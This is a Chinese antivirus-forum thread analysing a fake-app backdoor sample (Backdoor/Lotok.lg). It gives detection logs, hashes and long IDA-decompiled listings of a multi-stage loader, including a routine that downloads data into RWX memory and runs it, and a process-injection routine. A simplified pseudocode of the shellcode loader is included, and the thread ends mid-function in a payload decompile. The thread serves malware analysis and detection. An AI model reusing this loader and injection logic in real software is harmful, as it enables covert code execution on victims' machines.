未知Spyware #FakeAPP 1X

显示全部楼层 · 发表于 2025-10-19 20:11:18

神龟Turmi 发表于 2025-10-19 20:07
看起来是的，所以我想知道这是什么家族，结果研究了一个下午都没研究明白
（基本排除winos 排除原版gh0s ...

有可能是个大杂烩的大乱炖，集各家所长的矛盾集合体？哈哈

显示全部楼层 · 发表于 2025-10-19 20:21:43

本帖最后由请叫我德玛西亚于 2025-10-19 20:24 编辑

瑞星esm 、奇安信天擎 kill

显示全部楼层 · 发表于 2025-10-19 20:25:55

火绒内存扫描kill

病毒名称：Backdoor/Lotok.lg
病毒ID：FB6E538ADFC8E34D
虚拟地址：0x0000000010000000
映像大小：120KB
是否完整映像：否
数据流哈希：6f3475f0
操作结果：暂不处理
进程ID：7780
操作进程：C:\Users\PC\AppData\Local\Verifier.exe
操作进程命令行：C:\Users\PC\AppData\Local\Verifier.exe
父进程ID：7748
父进程：C:\Users\PC\Downloads\TS-251019-01\telcgrtup-xk_x64.6.1.3.9.exe
父进程命令行："C:\Users\PC\Downloads\TS-251019-01\telcgrtup-xk_x64.6.1.3.9.exe"

复制代码

火绒提取出的内存转储如下：

又分析了一下。

regsvr32.exe(Memory)：

样本 regsvr32.exe_ 是 32 位 PE（基址 0x10000000，大小 0x36000，MD5 102e4ae8b51110b38e5c059296c65943，SHA256 4d9eb46b40b6b9adf5d93eb864f2d0f6bc462fd23a7f3c9755fafcdc160e0798），伪装成 regsvr32.exe 但导入表为空，所有 API 通过自定义调度表手工解析，明显属于被修改的恶意构件。
• DllEntryPoint (0x1000895b) 内嵌 RC4-like 密钥调度及密文流处理（寄存器 %256 循环、交换表等），将全局缓冲区解密后通过 sub_10007E88 追加至动态结构，再调用 sub_10008BBE/sub_100039A2 清理，表明入口处已经承担第一阶段 payload 解密工作。
• 大型字符串表位于 .rdata 末段（如 0x10032000 起），包含 VirtualAlloc、GetProcAddress、CreateMutexA、WaitForSingleObject、CoCreateInstance 等几十个内核/COM API 名称；这些名称由 byte_10022001 附近的函数包装器逐项解析，使静态检测难以获取真实依赖。
• 关键加载逻辑在 sub_100025A1（未被正常引用但包含主流程）：轮询全局数据 unk_10031B28/unk_1002B5DC，失败时调用 Sleep(3000) 重试；成功后通过 VirtualAlloc(…, 0x3000, 0x40) 分配 RWX 内存，借助 sub_1000BB80（memcpy）写入解密结果并直接当作函数指针执行，典型内存投递/反射式装载手法。
• 自定义 API 分发表 byte_10022001 内多段小序言（mov eax,<addr>; jmp 等），逐步填充自字符串表解析出的真实函数地址；整套机制绕过 IAT，结合 RC4 解密与内存执行，符合多阶段 loader 行为。

补充说明
• mcp_list_imports 返回空列表，说明正常导入被剥离；加上动态解析列表中含 ShellExecuteA、VirtualAllocEx、CreateToolhelp32Snapshot 等，潜在具备持久化与进程注入能力。
• 当前分析未解出 RC4 密钥及最终内存中第二阶段的真实内容；需后续还原 unk_10031B28 等配置块，或在沙箱下监控 VirtualAlloc 后的执行流，才能进一步确认具体目的（如木马回连、Credential Dump 等）。
• sub_100025A1 通过大量函数指针调用（偏移 0x403、0x407、0x427 等）访问操作系统 API，由于 IDA 未能自动识别交叉引用，请在调试中断于该函数，跟踪 byte_10022001 表填充过程，可快速映射真实 API 名称。

后续建议
• 继续在 IDA 中恢复 byte_10022001 调度表（可在运行时打断点观察解析出的函数地址），明确每个偏移对应的 WinAPI。
• 编写脚本重现 DllEntryPoint 的 RC4 解密逻辑，从 unk_10031B28 等段落提取并解密第二阶段，以便静态分析最终 payload。
• 将样本放入隔离沙箱运行，重点监控网络请求、注册表及进程注入行为，验证其 C2 或持久化特征。

int sub_100025A1()
{
int v0; // ebx
_DWORD *v1; // esi
int v2; // eax
int v3; // esi
int v4; // eax
int v5; // edi
int v6; // ebx
int v7; // eax
void (__stdcall *v8)(int, int, int); // esi
int v10; // [esp-18h] [ebp-1E0h]
int v11; // [esp-14h] [ebp-1DCh]
int v12; // [esp-10h] [ebp-1D8h]
int v13; // [esp+0h] [ebp-1C8h]
int v14; // [esp+0h] [ebp-1C8h]
int v15; // [esp+0h] [ebp-1C8h]
int v16; // [esp+0h] [ebp-1C8h]
int v17; // [esp+4h] [ebp-1C4h]
int v18; // [esp+4h] [ebp-1C4h]
int v19; // [esp+4h] [ebp-1C4h]
int v20; // [esp+4h] [ebp-1C4h]
int v21; // [esp+4h] [ebp-1C4h]
int v22; // [esp+4h] [ebp-1C4h]
int v23; // [esp+8h] [ebp-1C0h]
int v24; // [esp+8h] [ebp-1C0h]
int v25; // [esp+8h] [ebp-1C0h]
int v26; // [esp+8h] [ebp-1C0h]
int v27; // [esp+8h] [ebp-1C0h]
int v28; // [esp+8h] [ebp-1C0h]
int v29; // [esp+Ch] [ebp-1BCh]
int v30; // [esp+Ch] [ebp-1BCh]
int v31; // [esp+Ch] [ebp-1BCh]
int v32; // [esp+Ch] [ebp-1BCh]
int v33; // [esp+Ch] [ebp-1BCh]
int v34; // [esp+Ch] [ebp-1BCh]
int v35; // [esp+10h] [ebp-1B8h] BYREF
int v36; // [esp+14h] [ebp-1B4h]
int v37; // [esp+18h] [ebp-1B0h]
int v38; // [esp+1Ch] [ebp-1ACh]
int v39; // [esp+20h] [ebp-1A8h]
int v40; // [esp+24h] [ebp-1A4h]
int v41; // [esp+28h] [ebp-1A0h]
int v42; // [esp+2Ch] [ebp-19Ch]
int v43; // [esp+30h] [ebp-198h]
int v44; // [esp+34h] [ebp-194h]
int v45; // [esp+38h] [ebp-190h]
int v46; // [esp+3Ch] [ebp-18Ch]
int v47; // [esp+40h] [ebp-188h]
int v48; // [esp+44h] [ebp-184h]
int v49; // [esp+48h] [ebp-180h]
int v50; // [esp+4Ch] [ebp-17Ch]
int v51; // [esp+50h] [ebp-178h]
int v52; // [esp+54h] [ebp-174h]
int v53; // [esp+58h] [ebp-170h]
int v54; // [esp+5Ch] [ebp-16Ch]
int v55; // [esp+60h] [ebp-168h]
int v56; // [esp+64h] [ebp-164h]
int v57; // [esp+68h] [ebp-160h]
int v58; // [esp+6Ch] [ebp-15Ch]
int v59; // [esp+70h] [ebp-158h]
int v60; // [esp+74h] [ebp-154h]
int v61; // [esp+78h] [ebp-150h]
int v62; // [esp+7Ch] [ebp-14Ch]
int v63; // [esp+80h] [ebp-148h]
int v64; // [esp+84h] [ebp-144h]
int v65; // [esp+88h] [ebp-140h]
int v66; // [esp+8Ch] [ebp-13Ch]
int v67; // [esp+90h] [ebp-138h]
int v68; // [esp+94h] [ebp-134h]
int v69; // [esp+98h] [ebp-130h]
int v70; // [esp+9Ch] [ebp-12Ch]
int v71; // [esp+A0h] [ebp-128h]
int v72; // [esp+A4h] [ebp-124h]
int v73; // [esp+A8h] [ebp-120h]
int v74; // [esp+ACh] [ebp-11Ch]
int v75; // [esp+B0h] [ebp-118h]
int v76; // [esp+B4h] [ebp-114h]
int v77; // [esp+B8h] [ebp-110h]
int v78; // [esp+BCh] [ebp-10Ch]
int v79; // [esp+C0h] [ebp-108h]
int v80; // [esp+C4h] [ebp-104h]
int v81; // [esp+C8h] [ebp-100h]
int v82; // [esp+CCh] [ebp-FCh]
int v83; // [esp+D0h] [ebp-F8h]
int v84; // [esp+D4h] [ebp-F4h]
int v85; // [esp+D8h] [ebp-F0h]
int v86; // [esp+DCh] [ebp-ECh]
int v87[4]; // [esp+1A0h] [ebp-28h] BYREF
__int64 v88; // [esp+1B0h] [ebp-18h]
__int64 v89; // [esp+1B8h] [ebp-10h]
_DWORD *v90; // [esp+1C0h] [ebp-8h] BYREF
int v91; // [esp+1C4h] [ebp-4h]
v90 = 0;
v0 = -1;
v91 = -1;
((void (__stdcall *)(int, int *, int, int, int, int))((char *)&byte_10022001 + 423))(514, &v35, v13, v17, v23, v29);
v87[0] = 0;
v88 = 0i64;
v89 = 0i64;
v87[1] = 2;
v87[2] = 1;
v87[3] = 6;
while ( 1 )
{
if ( !((int (__stdcall *)(void *, void *, int *, _DWORD **, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 419))(
&unk_10031B28,
&unk_1002B5DC,
v87,
&v90,
v14,
v18,
v24,
v30,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81) )
{
v1 = v90;
if ( v90 )
{
do
{
v2 = ((int (__stdcall *)(_DWORD, _DWORD, _DWORD, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 407))(
v1[1],
v1[2],
v1[3],
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82);
v0 = v2;
v91 = v2;
if ( v2 != -1 )
{
if ( ((int (__stdcall *)(int, _DWORD, _DWORD, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 403))(
v2,
v1[6],
v1[4],
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82) != -1 )
break;
((void (__stdcall *)(int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 427))(
v0,
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84);
v0 = -1;
v91 = -1;
}
v1 = (_DWORD *)v1[7];
}
while ( v1 );
v1 = v90;
}
((void (__stdcall *)(_DWORD *, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 415))(
v1,
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84);
if ( v0 != -1 )
break;
}
((void (__stdcall *)(int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 11))(
3000,
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84);
}
v3 = 4096;
v4 = sub_100107F3(4096);
v5 = 0;
LABEL_12:
v6 = v4;
while ( 1 )
{
v7 = ((int (__stdcall *)(int, int, int, _DWORD, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 399))(
v91,
v5 + v6,
v3 - v5,
0,
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81);
if ( v7 <= 0 )
break;
v5 += v7;
if ( v5 == v3 )
{
v3 *= 2;
v4 = sub_1000F4F5(v6);
goto LABEL_12;
}
}
if ( v7 )
{
((void (__stdcall *)(int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 427))(
v91,
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84);
((void (__stdcall *)(int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 411))(
v16,
v22,
v28,
v34,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84,
v85);
sub_1000FD3F(v6);
return 1;
}
else
{
((void (__stdcall *)(int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 427))(
v91,
v15,
v19,
v25,
v31,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84);
((void (__stdcall *)(int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 411))(
v20,
v26,
v32,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82,
v83,
v84,
v85,
v86);
v8 = (void (__stdcall *)(int, int, int))((int (__stdcall *)(_DWORD, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int))((char *)&byte_10022001 + 43))(
0,
v5,
12288,
64,
v21,
v27,
v33,
v35,
v36,
v37,
v38,
v39,
v40,
v41,
v42,
v43,
v44,
v45,
v46,
v47,
v48,
v49,
v50,
v51,
v52,
v53,
v54,
v55,
v56,
v57,
v58,
v59,
v60,
v61,
v62,
v63,
v64,
v65,
v66,
v67,
v68,
v69,
v70,
v71,
v72,
v73,
v74,
v75,
v76,
v77,
v78,
v79,
v80,
v81,
v82);
sub_1000BB80(v8, v6, v5);
v8(v10, v11, v12);
sub_1000FD3F(v6);
return 0;
}
}

复制代码

核心功能推测
1. 初始化连接：
• 通过偏移地址调用函数（如byte_10022001 + 423），传递参数514（可能是端口或操作码）。
• 初始化结构体v87 = {0, 2, 1, 6}（可能代表协议类型或指令集）。
2. 设备/连接枚举：
• 循环调用byte_10022001 + 419遍历设备列表（v90链表结构）。
• 对每个设备尝试激活（byte_10022001 + 407）和连接（byte_10022001 + 403），成功则跳出循环。
3. 数据读取：
• 分配4096字节缓冲区（sub_100107F3）。
• 循环读取数据（byte_10022001 + 399），动态扩容缓冲区（sub_1000F4F5）。
• 若读取失败（v7 < 0），关闭连接返回错误（return 1）。
4. 代码执行：
• 成功读取数据后，分配可执行内存（12288 = MEM_COMMIT|MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE）。
• 复制数据到内存（sub_1000BB80）。
• 直接执行内存中的代码（v8(v10, v11, v12)），最后释放缓冲区（sub_1000FD3F）。
关键特征
• 动态代码执行：函数末尾将接收的数据作为代码执行，常见于恶意软件（Shellcode注入）等。
潜在风险
• 高危行为：动态分配可执行内存并跳转执行（v8(...)）是典型的安全漏洞利用/恶意代码特征。正常软件极少需要这种操作。
伪代码逻辑

int sub_100025A1() {
// 初始化连接
init_connection(514, ...);
// 枚举设备直到找到可用连接
while (true) {
devices = enum_devices();
for (device in devices) {
if (activate_device(device) && connect_device(device)) {
handle = device.handle; // v91
break;
}
}
if (handle != -1) break;
Sleep(3000); // 重试等待
}
// 动态读取数据
buffer = malloc(4096);
while ((bytes_read = read_data(handle, buffer)) > 0) {
total_size += bytes_read;
if (buffer_full) buffer = realloc(buffer*2);
}
if (read_error) {
close_connection();
return 1; // 失败
}
// 执行接收到的代码
exec_mem = VirtualAlloc(..., PAGE_EXECUTE_READWRITE);
memcpy(exec_mem, buffer, total_size);
((void(*)(int,int,int))exec_mem)(arg1, arg2, arg3); // 危险操作
free(buffer);
return 0; // 成功
}

复制代码

建议
• 安全审查：此代码行为高度可疑，需排查是否涉及未授权代码执行。

Verifier.exe(Memory):

发现要点
• DllEntryPoint位于0x10003368处，会立即跳转至自定义运行时：分配临时缓冲区（sub_10002650/sub_10005210），通过sub_10002E10解压内嵌数据块，并通过sub_1000340A循环返回，表明这是一个分阶段加载器，且采用了激进的控制流混淆技术。
• 所有Windows API均在运行时动态解析；没有导入表（mcp_list_imports返回为空）。加载器会遍历编码字符串表（参见sub_10002850、sub_10003540、sub_10003650），构造Unicode名称后传递给LoadLibraryExW/GetProcAddress。
• 字符串池包含一组敏感API：进程枚举（CreateToolhelp32Snapshot、Process32FirstW/NextW）、远程内存操作（OpenProcess、VirtualAllocEx、WriteProcessMemory、CreateThread）、互斥体/实例控制（CreateMutexA）、终端/会话发现（WTSGetActiveConsoleSessionId、AppPolicyGetProcessTerminationMethod）以及网络检查（GetTcpTable2）。这些组合强烈暗示了进程注入行为，并伴有主机/网络侦察功能。
• sub_10003C7D中的初始化逻辑执行受保护的一次性设置（CreateMutexA、宽字符串比较），并在调用外部指针0x5E1C114后通过回调表分发，表明可能存在反射加载或与其他组件的集成。

已观察到的能力
• 可能枚举正在运行的进程，并使用Toolhelp快照选择目标。
• 准备远程内存区域，通过VirtualAllocEx/WriteProcessMemory将有效负载写入其他进程，然后通过CreateThread启动执行。
• 收集TCP连接数据（GetTcpTable2）和会话上下文，用于受害者指纹识别或横向移动决策。
• 使用基于互斥体的单实例控制和加密配置数据块（大量非ASCII字符串字面量）来避免重复执行和静态分析。

后续步骤
• 1. 在调试器/沙箱中运行该DLL并启用API日志记录，以确认注入目标并捕获任何第二阶段有效负载。
• 2. 提取并解码sub_10003C7D/sub_100077CD引用的配置数据块，以恢复C2端点或过滤规则。
• 3. 在受控虚拟机中监控子进程或注入的线程，以观察持久化行为和网络IOC。

sub_10002040（位于0x10002040）是执行整个序列的例程：它调用sub_10010024(..., 0, 0x1000, 0x3000, 0x4)来封装VirtualAllocEx，紧接着调用sub_10010098封装WriteProcessMemory，一旦有效载荷和簿记数据准备就绪，它便通过sub_10010020获取线程创建指针并调用该指针以在远程进程中启动执行。

char __fastcall sub_10002040(int a1, int a2)
{
int v2; // edi
int v3; // ebx
int v4; // eax
int *v5; // edi
char *v6; // esi
char *v7; // eax
int v8; // edx
unsigned int v9; // ecx
int v10; // esi
int v11; // edx
int v12; // eax
void (__stdcall *v13)(int, int, _DWORD, _DWORD, _DWORD); // eax
int v15[4]; // [esp+10h] [ebp-34h] BYREF
unsigned int v16; // [esp+20h] [ebp-24h]
unsigned int v17; // [esp+24h] [ebp-20h]
__int64 v18; // [esp+28h] [ebp-1Ch] BYREF
int v19; // [esp+34h] [ebp-10h]
int v20; // [esp+38h] [ebp-Ch] BYREF
int v21; // [esp+3Ch] [ebp-8h]
v2 = a1;
v21 = a1;
v18 = a2;
v19 = sub_10010024(a1, 0, 4096, 12288, 4);
sub_10010098(v2, v19 + 56, &v18, 8, 0);
v3 = 0;
while ( 1 )
{
++v3;
v4 = ((int (__stdcall *)(int *, _DWORD, _DWORD, int))(&sub_10010090 + 1))(&v20, 0, 0, 2);
sub_1001016C(v2, v3, v4);
((void (__fastcall *)(int *, int))loc_10001D70)(v15, v20);
if ( v16 )
break;
LABEL_9:
sub_1001001C(v20);
if ( v17 > 0xF )
{
v8 = v15[0];
if ( v17 + 1 >= 0x1000 )
{
v8 = *(_DWORD *)(v15[0] - 4);
v9 = v17 + 36;
if ( (unsigned int)(v15[0] - v8 - 4) > 0x1F )
goto LABEL_18;
}
sub_10003BF9(v8);
}
}
v5 = v15;
if ( v17 > 0xF )
v5 = (int *)v15[0];
if ( v16 < 0xC
|| (v6 = (char *)v5 + v16, v7 = (char *)sub_10003BC0(v5, (char *)v5 + v16, &unk_100172CC, 12), v7 == v6)
|| v7 - (char *)v5 == -1 )
{
v2 = v21;
goto LABEL_9;
}
v10 = v20;
if ( v17 > 0xF )
{
v11 = v15[0];
if ( v17 + 1 >= 0x1000 )
{
v11 = *(_DWORD *)(v15[0] - 4);
v9 = v17 + 36;
if ( (unsigned int)(v15[0] - v11 - 4) > 0x1F )
LABEL_18:
sub_10007353(v9);
}
sub_10003BF9(v11);
}
v16 = 0;
v17 = 15;
LOBYTE(v15[0]) = 0;
v12 = sub_1001002C(&unk_100172DC);
v13 = (void (__stdcall *)(int, int, _DWORD, _DWORD, _DWORD))sub_10010020(v12, &off_100172F0);
v13(v10, v19, 0, 0, 0);
return 0;
}

复制代码

函数功能推测
1. 内存操作：
• sub_10010024分配内存（类似VirtualAlloc），参数4096（内存大小）、12288（通常为MEM_COMMIT | MEM_RESERVE）、4（PAGE_READWRITE权限）。
• sub_10010098将参数a2（64位值）写入分配的内存偏移56字节处（v19 + 56）。
2. 循环搜索：
• 通过loc_10001D70获取数据到v15数组，检查v16（数据长度）和v17（缓冲区容量）。
• 若v16 != 0，尝试在数据中搜索特征码unk_100172CC（12字节）：

sub_10003BC0(v5, (char*)v5 + v16, &unk_100172CC, 12);

复制代码

• 未找到特征码则继续循环（LABEL_9释放资源后重试）。
3. 动态函数调用：
• 找到特征码后，通过sub_10010020获取函数指针v13（类似GetProcAddress）。
• 最终调用v13(v10, v19, 0, 0, 0)，推测是执行注入的代码（如CreateRemoteThread）。
关键逻辑

while (1) {
// 1. 获取资源句柄 (v20)
v4 = ((int(*)(int*,0,0,2))(&sub_10010090 + 1))(&v20, 0, 0, 2);
// 2. 关联资源与当前环境
sub_1001016C(v2, v3, v4);
// 3. 解析资源数据到v15/v16/v17
loc_10001D70(v15, v20);
if (v16 != 0) { // 有有效数据
// 4. 搜索特征码
if (v16 >= 12 && 找到特征码) {
// 5. 执行目标函数
v13 = GetProcAddress(模块, 函数名);
v13(v10, v19, 0, 0, 0);
break;
}
}
// 6. 释放资源继续循环
sub_1001001C(v20);
}

复制代码

技术细节
• 内存管理：
v17 > 0xF时使用堆内存（v15[0]为指针），否则用栈内存。
sub_10003BF9释放内存（类似free）。
• 错误处理：
sub_10007353可能是异常处理（参数v9为错误码）。
• 调用约定：
__fastcall：参数通过ECX/EDX传递（a1/a2）。
__stdcall：被调函数清理栈。
推测用途
可能是进程注入（Process Injection）代码：
1. 分配内存并写入payload（a2）。
2. 遍历系统资源（进程/线程）搜索目标。
3. 找到目标后执行内存中的payload。
风险提示
此类代码常见于：恶意软件（病毒/木马）等。

显示全部楼层 · 发表于 2025-10-19 20:29:50

emmm...至少这家族（如果算的话？）不算新了，就是之前靠patch白文件过掉好几次火绒人工分析的那个家族

另外分析这类样本对火绒来说应该是相当麻烦的，以至于在之后的某次上报中表示不会再对这族样本进行通杀处理：
https://bbs.huorong.cn/thread-155511-1-1.html

关联样本：
https://bbs.huorong.cn/thread-152616-1-1.html
https://bbs.huorong.cn/thread-152959-1-1.html （1楼以及7楼）

显示全部楼层 · 发表于 2025-10-19 20:31:21

UNknownOoo 发表于 2025-10-19 20:29
emmm...至少这家族（如果算的话？）不算新了，就是之前靠patch白文件过掉好几次火绒人工分析的那个家族

...

看来和我的收集渠道不太重合我还是第一次遇到这个家族
之前大量fakeapp都是gh0st/winos/cobaltstrike

显示全部楼层 · 发表于 2025-10-19 20:45:04

UNknownOoo 发表于 2025-10-19 20:29
emmm...至少这家族（如果算的话？）不算新了，就是之前靠patch白文件过掉好几次火绒人工分析的那个家族

...

发现风险：2
已处理风险：2
病毒详情：
风险路径：mem://7780-0xab5b381d-0x10000000-C:\Users\PC\AppData\Local\Verifier.exe, 病毒名：Backdoor/Lotok.lg, 病毒ID：fb6e538adfc8e34d, 处理结果：处理成功，进程已结束
风险路径：mem://6444-0xe13c3f92-0x10000000-C:\Windows\SysWOW64\regsvr32.exe, 病毒名：Backdoor/Lotok.lg, 病毒ID：fb6e538adfc8e34d, 处理结果：处理成功，进程已结束

复制代码

还不错，"Backdoor/Lotok.lg" 这条特征到现在隔了一个月竟然还稳杀

显示全部楼层 · 发表于 2025-10-19 21:00:48

本帖最后由 wwwab 于 2025-10-19 22:35 编辑

wwwab 发表于 2025-10-19 15:32
这Shellcode，一眼顶真：

C:%users\PC\AppData\Local\Profiler.json

@UNknownOoo
Profiler.json GPUCache.xml GPUCache2.xml 这三个Shellcode好像特征点比较明显（尤其是前两个）
我让火绒给这仨Shellcode加点特征试试？（https://bbs.huorong.cn/thread-156327-1-1.html）

显示全部楼层 · 发表于 2025-10-19 21:49:03

看起来像是金眼狗团伙使用的木马

显示全部楼层 · 发表于 2025-10-19 22:57:08

本帖最后由 scottxzt 于 2025-10-19 23:13 编辑

已检测:Trojan:Win32/Egairtigado!rfn
file: F:\TS-251019-01\telcgrtup-xk_x64.6.1.3.9.exe

显示全部楼层 · 发表于 2025-10-19 23:30:59

本帖最后由 wwwab 于 2025-10-20 14:13 编辑

看到一个PAGE_EXECUTE_READ内存块，这个应该就是实际载荷了，和前面的进程内存字符串能对上。

void __noreturn VFPower()
{
HANDLE CurrentThread; // eax
HANDLE MutexA; // esi
_DWORD *v2; // eax
int v3; // eax
int v4; // esi
int v5; // eax
char v6; // al
_DWORD *v7; // eax
int v8; // eax
int v9; // esi
int v10; // eax
unsigned int v11; // eax
_DWORD *v12; // eax
int v13; // eax
int v14; // eax
int v15; // esi
int v16; // eax
_DWORD *v17; // eax
int v18; // eax
int v19; // eax
int v20; // esi
int v21; // eax
char v22; // al
HANDLE v23; // eax
int v24; // [esp-10h] [ebp-B8h] BYREF
int v25; // [esp-Ch] [ebp-B4h]
DWORD v26; // [esp-8h] [ebp-B0h]
unsigned int v27; // [esp+4h] [ebp-A4h]
char v28; // [esp+Bh] [ebp-9Dh]
int v29; // [esp+Ch] [ebp-9Ch] BYREF
int v30; // [esp+10h] [ebp-98h]
int v31; // [esp+14h] [ebp-94h]
int v32; // [esp+18h] [ebp-90h]
int v33; // [esp+1Ch] [ebp-8Ch] BYREF
int v34; // [esp+20h] [ebp-88h]
int v35; // [esp+24h] [ebp-84h]
int v36; // [esp+28h] [ebp-80h]
char v37[4]; // [esp+2Ch] [ebp-7Ch] BYREF
int v38; // [esp+30h] [ebp-78h]
char v39[24]; // [esp+44h] [ebp-64h] BYREF
char v40[24]; // [esp+5Ch] [ebp-4Ch] BYREF
char v41[24]; // [esp+74h] [ebp-34h] BYREF
char v42[28]; // [esp+8Ch] [ebp-1Ch] BYREF
v38 = 0;
CurrentThread = GetCurrentThread();
WaitForSingleObject(CurrentThread, 0x1388u);
MutexA = CreateMutexA(0, 0, "MianVjsdhan");
if ( GetLastError() != 183 )
